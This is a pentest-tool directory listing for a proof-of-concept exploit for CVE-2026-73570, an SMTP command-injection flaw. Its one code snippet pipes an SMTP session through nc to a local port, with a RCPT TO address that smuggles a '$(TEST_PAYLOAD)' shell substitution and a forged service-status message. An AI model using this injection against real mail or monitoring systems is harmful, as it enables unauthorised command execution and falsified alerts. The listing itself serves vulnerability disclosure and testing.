Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/biutrap/cve-2026-73570
Vulnerability AnalysisExploitationWeb Application ExploitationEmail Security
GitHubbiutrap/cve-2026-73570

CVE-2026-73570

Proof-of-concept exploit for CVE-2026-73570, demonstrating SMTP command injection via crafted RCPT TO header to trigger service status changes.

View Repository
1 day agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-73570

CVE-2026-73570 PoC

More

root@kitploit:~
echo 'EHLO mx-test.invalid
MAIL FROM:<[email protected]>
RCPT TO:<"x: Service status change: localhost $(TEST_PAYLOAD) changed from stopped to running"@cve.invalid>
QUIT\r\n' | nc 127.0.0.1 587
Download Tool